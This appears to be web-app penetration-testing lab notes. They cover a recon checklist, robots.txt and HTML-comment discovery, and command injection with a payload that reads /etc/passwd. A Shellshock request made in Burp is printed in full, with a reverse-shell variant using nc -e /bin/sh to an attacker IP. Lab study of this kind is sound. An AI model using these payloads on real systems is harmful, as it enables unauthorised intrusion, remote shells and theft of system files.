Web App Basic

Web App Basic Methodology

Make an account
Make a 2nd account
Examine both - is there any difference between them?
Manually Spider
Directory traversal
Command injection
Look for XSS in Form Fields & URL
SQL Injection
Steal cookies insert then as other user
Upload things - location where do they save
Dirbuster

robots.txt

The robots.txt file is used to tell web spiders how to crawl a website. To avoid having confidential information indexed and searchable, webmasters often use this file to tell spiders to avoid specific pages. This is done using the keyword Disallow. As an attacker, it's always a good idea to check the content of the robots.txt file and visit all the pages that are "disallowed" to find sensitive information.

HTML comments

HTML comments are often used to hide part of the application. For "security" reasons or just because a page or functionality has been removed from the website. You can easily access the source code of a page using the developer tools in Chrome or Firefox. Then you can search for comments in the HTML code. Comments start with <!-- and ends with -->. If you find a link, it's always worth visiting it.

Commands injection

Commands injection can be used to run arbitrary commands on a server. Multiple payloads can be used to trigger this behaviour. For example, let’s say that the initial command is:

ping [parameter]

Where [parameter] is the value you provided in the form or in the URL.

If you look at how the command line works, you can find that there is multiple way to add more commands:

command1 && command2 that will run command2 if command1 succeeds.
command1 || command2 that will run command2 if command1 fails.
command1 ; command2 that will run command1 then command2.
command1 | command2 that will run command1 and send the output of command1 to command2.
...

In this application, we can provide a parameter to command1, but there is no command2. What we are going to do is add our own command. Instead of sending the [parameter] to the command:

ping 127.0.0.1

Where 127.0.0.1 is our [parameter]. We are going to send a malicious [parameter] that will contain another command:

ping 127.0.0.1 ; cat /etc/passwd

The application will think that 127.0.0.1 ; cat /etc/passwd is just a parameter to run command1. But we actually injected command2: cat /etc/passwd.

Shellshock - via burpsuite

Proxy request - send /cgi-bin/status to repeater tab

User-Agent field - delete content and add following:
() { :;}; /usr/local/bin/score 24dd5fc5-bdd2-4d20-9b14-cf4ba32dfa24

Note - in real world scenario, we would be looking for a reverse shell back - so the above code would be: () { :;}; /usr/bin/nc 192.168.x.x 443 -e /bin/sh

GET /cgi-bin/status HTTP/1.1
Host: ptl-972d9262-8a657ffb.libcurl.so
User-Agent: () { :;}; /usr/local/bin/score 24dd5fc5-bdd2-4d20-9b14-cf4ba32dfa24
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://ptl-972d9262-8a657ffb.libcurl.so/
Connection: close
Cache-Control: max-age=0